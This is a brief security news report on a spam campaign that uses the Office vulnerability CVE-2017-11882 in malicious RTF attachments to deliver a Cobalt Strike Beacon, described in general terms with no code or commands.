Cobalt malware spotted in recent spam campaign
Cobalt malware spotted in recent spam campaign

Cobalt malware was documented exploiting the 17-year-old CVE-2017-11882 vulnerability via spam just a few days after researchers noted a similar spam campaign exploiting RTF documents.

Microsoft only recently patched the memory corruption vulnerability that exists in its Office software when the program fails to properly handle objects in memory. The flaw could allow an attacker to run arbitrary code.

Shortly after the vulnerability was announced, threat actors weaponized the flaw to deliver a malware using a component from a Cobalt Strike penetration testing tool, according to a Nov. 27 Fortinet blog post. The malware is spread via a spam campaign posing as a notification from Visa about rule changes in its payWave service in Russia and is contained in a malicious RTF document attachment.

Researchers said the CVE-2017-11882 exploit leads to a Cobalt Strike Beacon and that in this attack, multiple stages of scripts are downloaded and executed to get to the main malware payload. Once the exploit is triggered, an obfuscated JavaScript is downloaded and is executed by using Microsoft HTML Application Host.

“Once the document is opened, the user is presented with a plain document,” researchers said in the post. “However, in the background a PowerShell script is already being spawned that will eventually download a Cobalt Strike client to take control of the victim's system.”

The cybercriminals behind the attack were able to load Cobalt Strike's module without the need to write it as a physical file but instead by using the trusted Microsoft Windows tools to run client-side scripts, which can be overlooked by traditional anti-virus products.

Users are urged to update their systems as soon as possible to avoid infection.